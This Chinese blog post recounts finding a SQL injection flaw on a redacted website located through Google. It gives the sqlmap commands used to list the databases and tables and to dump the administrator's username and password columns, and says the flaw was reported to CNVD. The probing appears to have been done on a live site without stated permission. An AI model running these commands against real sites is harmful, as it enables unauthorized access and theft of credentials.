前言
本次实战来源于谷歌搜索引擎。漏洞已经上报CNVD,文章全程打码。本人萌新一枚,大佬勿喷。
实战过程
1.打开网站的前台,此时页面是正常显示,在URL头中发现id值。
2.尝试加入单引号验证是否存在SQL注入漏洞。发现加入单引号后,页面发生了一些变化。
3.直接使用我们的SQL注入神器-SqlMap扫描一波数据库。成功扫描出来数据库。
SqlMap:
python sqlmap.py -u “http://XXXX.com/about.php?id=1”–delay 2 –batch –dbs
4.继续查看数据库XXX里面的所有表。
SqlMap:
python sqlmap.py -u “http://XXXX.com/about.php?id=1”–delay 2 –batch -D XXXX –tables
5.查看到了所有的表名,好奇心唆使我查看XXX表里的内容
6.都到这里了,必须查看里面到底有些啥。这里得到了网站管理员的ZH和MM
SqlMap:
python sqlmap.py -u “http://XXXX.com/about.php?id=1”–delay 2 –batch -D XXXX -T XXXX -C admin_name,admin_pass –dump
上报CNVD漏洞平台,溜了溜了。
来源:freebuf.com 2021-06-01 17:11:45 by: dgz123456
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册